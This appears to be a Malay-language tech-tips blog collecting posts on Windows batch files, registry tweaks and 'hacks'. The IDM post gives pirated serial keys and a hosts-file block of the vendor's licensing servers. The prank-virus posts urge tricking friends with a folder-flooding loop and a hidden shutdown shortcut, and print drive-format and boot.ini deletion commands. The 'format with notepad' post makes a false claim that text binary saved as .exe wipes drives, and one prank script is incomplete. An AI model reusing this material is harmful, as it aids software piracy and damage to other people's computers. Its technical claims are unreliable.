Chat Menggunakan Lan Network




Assalamualaikum..
Admin agak bz kebelakangan ini serta kesibukan masa. So kali ini Admin akan kongsikan cara untuk chat tanpa perlukan software .Korang hanya perlukan notepad , command prompt dan ip address orang yang korang mahu chat.
so korang ikut langkah dibawah

Step 1. Buka notepad letakkan koding dibawah

@echo off
:A
Cls
echo MESSENGER (http://john-komputer.blogspot.com/)
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

korang save dengan nama "Messenger.bat".

Step 2. Korang double klik pada fail Messenger.bat tu dan ia akan memaparkan
command prompt seperti dibawah



Selepas user korang taip ip address member korang untuk chat. tekan enter

Selepas itu korang dikehendaki menaip mesej yang korang nak send then korang enter.
bawah ialah contoh.:
MESSENGER (http://john-komputer.blogspot.com/)
User: 56.108.104.107
Message: Hi
Senang kan?? kah3.. 

Selamat mencuba..!





Read More - Chat Menggunakan Lan Network

Tambah Kelajuan Shutdown



Pergi start>run taip regedit pastu korang ikut macam dibawah

HKEY_CURRENT_USER\Control Panel\Desktop\

Korang rightclick "WaitToKillAppTimeout" korang modify jadi '1000' 
then korang click ok

Rightclick plak pada "HungAppTimeout" modify jadi '1000' 
then korang click ok 

Korang carik pula yang ini

HKEY_USERS\.DEFAULT\Control Panel\Desktop 

'WaitToKillAppTimeout'   korang modify value jadi "1000"
Pastu klik ok

Cari lagi yang baru dibawah 
'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\' 

WaitToKillServiceTimeout korang ubah jadi "1000"
klik ok.

settle.. selamat mencuba.. 


Read More - Tambah Kelajuan Shutdown

Lajukan Start Menu





Step 1. Korang pergi start>run>regedit.

Step 2. Pastu korang ikut ni HKEY_CURRENT_USER\Control Panel\Desktop\

Step 3. korang pilih "MenuShowDelay"pastu right klik pilih modify dan tukarkan ke 100

Step 4. Kalau korang tidak berpuas hati dengan kelajuan start menu korang leh tukarkan ke 0.

Admin sarankan korang guna 100. ade la sebab2 tertentu Admin sarankan .. 
Selamat mencuba..  Cheer :)

Read More - Lajukan Start Menu

Cara Lajukan Adobe Reader Selaju Notepad






Korang menyampah tak kalau buka Adobe Reader lembab cam siput.. Mesti korang angin kan.? hehe..So pada kali ini Admin akan kongso dengan korang cara untuk buat Adobe Reader korang laju buka macam notepad. kah3.. xcaya?? mai try..


Step 1 . Korang pergi ke tempat folder korang install contoh
 (C:\program file>adobe>acrobat>reader>..... dan lain2.>


Step 2. Korang cut fail dalam  folder "plugin" dan paste ke dalam "optional" directories(ingt cut bukan copy kah3..)


Step 3. Pastikan tutup Adobe kalau tidak korang tidak boleh cut fail tersebut.


Step 5. Sekarang korang open adobe dan rasakan seperti korang buka notepad.. :)


Apa2 masalah korang boleh tinggalkan komen k.

Selamat mencuba..

Read More - Cara Lajukan Adobe Reader Selaju Notepad

Cara Buang Captca ( Word Verification )


Kebiasaan nya kalau korang download2 ade kena tu ggu kan?? So Admin tidak mahu
membuang masa, disini ada addon untuk membuang captca . Pasang Addon ini pada mozilla firefox korang
dan korang boleh download dengan laju tanpa perlu menunggu.

support site.


Download disini

Admin Xsure bende  ni leh pakai or x lagi.. kalau da try bg feedback kt Admin

Read More - Cara Buang Captca ( Word Verification )

Cara Hack Website Dengan Cara Yang Mudah !!!




Maybe korang geram dengan sesetengah website atau blog yang mencopy paste 
entri korang.. so kali ini Admin ajar korang cara hancurkan terus website orang tu dengan sangat mudah. jangan risau tiada risiko . no ip tidak boleh diditect. kah3..
korang pun boleh hancurkan blog Admin kalau korang rasa geram dengan Admin haha..

Cara nya amat mudah

Step 1. korang cari target blog mana korang nk attack.

Step 2. Oraite korang just copy paste javascript dibawah dan paste pada address bar 
laman web tersebut.

javascript:var%20s%20=%20document.createElement('script');s.type='text/javascript';document.body.appendChild(s);s.src='http://erkie.github.com/asteroids.min.js';void(0);

So hati2 korang kena kawal betul2 bende alah ni bagi btul2 hancur blog or websites
tersbut

Selepas masuk javascript kod tu pada adress bar korang akan nampak 1 bender alah tigasegi.
Cara kawal korang guna huruf pada keyboard w,a,s,d sebagai arrow key untuk control
pastu space untuk korang attak hancurkan web tersebut..
So korang akan rasa puas hati kan.. kah3..


Read More - Cara Hack Website Dengan Cara Yang Mudah !!!

Virus Prank Yang Menakutkan




Assalamualaikum..
Oraite Admin tidak mahu buang masa so kali  ini Admin akan kongsi dengan korang virus prank  yang agak merbahaya juga kah3.,.

Virus ini 1 bentuk arahan komputer yang bagi korang 5 pilihan. Jika korang salah pilih
dalam 5 pilihan tersebut  maka akan terjadi seperti pilihan dibawah.


@echo off
title The end of the world
cd C:\
:menu
cls
echo Admin tidak akan bertanggung jawab keatas apa2 yang terjadi . Kah2.. korang dilarang menutup command ini.jika korang tekan x(pangkah) maka komputer korang akan terformat dengan sendirinya. So jangan korang menyesal atau menangis jika semua data2 dalam komputer korang licin kah3.. korang kena trima seadanya.layari web dibawah untuk mendapatkan lebih banyak virus dan hack http://john-komputer.blogspot.com/
pause
echo Pick your poison:
echo 1. Korang mahu mati dijilat digigit anjing?
echo 2. Korang tidak mahu mati ?
echo 3. Korang mahu mati disondol babi? kah3..
echo 4. Mati dalam keaadan terjojol?
echo 5. Mati secaraa perlahan2..
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two


Korang copy paste koding diatas pada notepad dan simpan apa2 nama sekalipun 
asalkan di belakang ade .bat .. contoh :  pensil.bat

Jika korang tekan

1: Shutdown
2: Restart
3: Wipes out your hard drive (Hati2)
4: Net send
5: Messages then shutdown



Kah3.. hati2 dengan jawapan korang..Selamat mencuba


Read More - Virus Prank Yang Menakutkan

Cara Tukar Yahoo Messenger Title Bar




Admin berkogsi sedikit tip untuk menukar nama di title bar yahoo massenger.

Step 1. Install Yahoo messenger 

Step 2. Korang cari folder di drive C >program files > Yahoo messenger

Step 3. Cari fail yang nama "ymsgr". Dalam fail tersebut korang jangan usik apa2 cuma korang
tambahkan kod dibawah

 [APP TITLE]
CAPTION=Hackpensil

Step 5. Nama hackpensil tu korang boleh tukar dengan apa2 nama korang suka .

Selamat mencuba .. Sorry entry yang selenger.. kah3..

Read More - Cara Tukar Yahoo Messenger Title Bar

Cara Hack / Crack IDM Secara Manual




Assalamualaikum...
Admin akan kongsi cara untuk hack idm korang secara manual tanpa perlu download crack
dan sebagainya. Tapi korang perlu ada software IDM yang jenis trial la. kalau tidak macammana
mahu crack kan.. kah3..

Step 1. Download IDM trial version

Step 2. Korang updated kan idm tersebut jika IDM lapuk punya.. :)

Step 3. Oraite Korang tekan register akan keluar dialog minta korang masukkan 
name, last name , email , serial key.

Step 4. Korang masukkan nama korang dan email korang juga serta ambik salah 1
serial key dibawah.

RLDGN-OV9WU-5W589-6VZH1
HUDWE-UO689-6D27B-YM28M

UK3DV-E0MNW-MLQYX-GENA1

398ND-QNAGY-CMMZU-ZPI39

GZLJY-X50S3-0S20D-NFRF9

W3J5U-8U66N-D0B9M-54SLM

EC0Q6-QN7UH-5S3JB-YZMEK

UVQW0-X54FE-QW35Q-SNZF5

FJJTJ-J0FLF-QCVBK-A287M
Pastu klik ok untuk register

Step 5. Oraite lepas tekan ok software tu keluar popup cakap fake serial key dan IDM akan
tertutup. Maka Disini permainan bermula.. kah3..

Step 6. Korang pergi Start>run pastu korang taip perkataan dibawah yang Admin bold.
notepad %windir%\system32\drivers\etc\hosts 

Kepada Pengguna Xp skip langkah ini tru ke step 7., 

Note: Kepada Pengguna Windows 7 atau vista korang akan mengalami masalah untuk 
save host fail.So cara bagi pengguna windows 7 dan vista untuk mencari fail adalah seperti 
dibawah:
Pergi C:/ drive pastu pergi ke folder windows then pergi ke system32 pastu pilih driver
folder dan pastu korang pergi ke Etc folder. (dalam folder etc korang akan nampak host fail)

Korang rightclick fail host tersebut pilih properties pastu pilih security>pilih Admin accaunt
bawah tu korang akan nmpak button edit(didepan change of permision) .

sekarang korang bagi user full control and write and read rights dan klik pada apply dan klik pada c Ok, sekarang pengguna 7 boleh edit host fail dan boleh save host fail tersebut..


Step 7. Korang buka fail host tesebut akan keluar seperti gambar dibawah



  Sekarang korang copy dan paste pada yang Admin tandakan diatas

127.0.0.1    tonec.com
127.0.0.1    www.tonec.com
127.0.0.1    registeridm.com
127.0.0.1    www.registeridm.com
127.0.0.1    secure.registeridm.com
127.0.0.1    internetdownloadmanager.com
127.0.0.1    www.internetdownloadmanager.com
127.0.0.1    secure.internetdownloadmanager.com
127.0.0.1    mirror.internetdownloadmanager.com
127.0.0.1    mirror2.internetdownloadmanager.com


selepas letak kod diatas, save fail notepade tesebut. dan exit.
Sekarang korang start Internet download manager, dan IDM korang sudah divonvert menjadi full version walaupun korang update akan datang :), registration Korang  tidak akan expire. Ini bermakna korang telah 
hack untuk mendapatkan fullversion juga.. kah3..

Untuk pengetahuan korang lagi.. Cara ini lah yang mereka2 diluar negara buat Crack untuk korang dapat free IDM.. selain itu cara crack ini boleh juga digunakan menggunakan software.. Ade masa Admin post.
bagi pengguna windows 7 mayb korang ade masalah. tinggalkan komen korang jika korang mengalami apa2 masalah. Admin perlu feedback korang..  Selamat mencuba..

Read More - Cara Hack / Crack IDM Secara Manual

Cara Format Hardisk Guna Notepad


Assalamualaikum..

Ribuan terima kasih yang telah mengikuti entry2 terbaru Admin walaupun dalam minggu ini
Admin agak sibuk sedikit. So kali ini Admin akan berkongsi cara untuk format hardisk korang dengan hanya menggunakan notepad sahaja.. Caranya seperti dibawah:


Step 1.Korang copy dan paste binary kod dibawah pada notepad

01001011000111110010010101010101010000011111100000



Step 2. Lepas dah copy paste korang save dengan nama apa2 pon tetapi hujungnya
mesti .exe   
Contoh gambar dibawah:




Note: Jangan korang saja2 tekan di komputer korang pulak .Kahh3,,..


dibawah ni Admin kongsi beberapa binary kod serta fungsinya.. Cara save juga sama diatas ye..




format c:\ /Q/X -- binary kod akan format c:\ korang

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000


format d:\ /Q/X -- binary kod yang akan format d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000


format a:\ /Q/X --binary kod yang akan format drive a:\

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000


del /F/S/Q c:\boot.ini -- binary kod ini bagi komputer korang xleh boot.. .

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

011011100110100


Cara sama seperti Admin ajar diatas.. hati2 k semasa mencuba kah3..

Read More - Cara Format Hardisk Guna Notepad

Cara untuk Rosakkan Pc Dengan Hanya Menggunakan URL




Garang kan Tajuk Admin? kah3.. Link yang Admin dibawah boleh buat komputer seseorang hang
apabila menekan tersebut hehe.. So korang boleh kenakan kawan2 korang difacebook.. :)
Korang xcaya?? tekan link tu.. hehe :)
Link Adalah dibawah


Note: Kemungkinan kecil trick ini tidak menjadi sekiranya seseorang itu memakai ram yang tinggi.. :)



Read More - Cara untuk Rosakkan Pc Dengan Hanya Menggunakan URL

Cara Untuk Convert Youtube kepada Mp3 Tanpa Software





Assalamualaikum.. 
Pada kali ini Admin akan berkongsi dengan korang cara untukconvert video dari mana2 site 
menjadi mp3.. korang percaya atau tidak korang try sendiri kah3... Link 
dibawah k.



Korang masukkan link video mana ko nk convert ja.. pastu download..Mudah kan??
Selamat mencuba.. :)


Read More - Cara Untuk Convert Youtube kepada Mp3 Tanpa Software

Cara Lock Folder Secara Manual




Assalamualaikum..

Admin ajar korang cara untuk lock folder tanpa menggunakan sebarang software

Step 1. Korang buka notepad pastu copy paste koding dibawah dan simpankan pensil.bat

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End

Step 2. lepas save korang double click 2 kali untuk buat folder locker. 

Step 3. Lepas save namakan locker pada lokasi yang same korang save fail tadi.. 

Step 4. Korang ambil fail yang korang nak lock dalam folder tersebut.Korang double klik 
pada batch fail tersebut untuk lock folder itu.


Step 5. Kalau korang nak unlock fail intu korang just double klik pastu nanti akan keluar
prompt mntak password.. masukkan password.. kah3.. settle..

Korang xpaham tingglkan komen sebab aku pon kurang paham apa yang aku terangkan kah3..












Read More - Cara Lock Folder Secara Manual

Cara Buat Prank Virus




Assalamualaikum..
Hari ni Admin akan berkongsi cara untuk buat prank virus. Prank virus ni boleh korang ketogerikan sebagai virus tipu2 la.. kah3.. korang pilih la virus tipu2 camna korang nak Admin rasa sudah lebih 3 entri tentang virus prank Admin post. So korang pilih2 la..

1. Virus Shutdown

Step 1. korang right click di dekstop korang dan pergi ke new>shortcut

Step 2. keluar gambar seperti gambar diatas korang masukkan koding di bawah

shutdown -s -t 300 -c "Your Message"

Step 3.Korang klik next pastu finish. Mudah kan.. :)
Note: korang nak buat lagi tidak perasan korang boleh menukar icon .(rightclick kt fail yang korang save pastu properties change icon ape2 yang korang nk ..


2. Virus Berjangkit
Haa.. korang heran kan xpenah dengar... Admin yang namakan kah3..
kenapa Admin namakan macam tu? kerana virus ini akan menambah folder apabila diklik contoh gambar dibawah keh3..

Cara membuat virus ini

Step 1.Buka notepad korang pastu korang copy paste koding dibawah
@echo off
color 0a
:eh
md %random%
goto eh  
Atau 

@echo off
color 0a
:eh
md %random%
goto eh 
(koding warna merah ia akan makan memory space)
korang save dengan apa2 nama sekalipun tetapi dengan syarat mesti fail .bat
contohnya pensil.bat
Korang boleh mencubanya sendiri.. yang ke 2 tu bukan prank k.. 
Sorry video ini yang selenger kerana menulis dalam keadaan tergesa-gesa..
bz sket :p



Read More - Cara Buat Prank Virus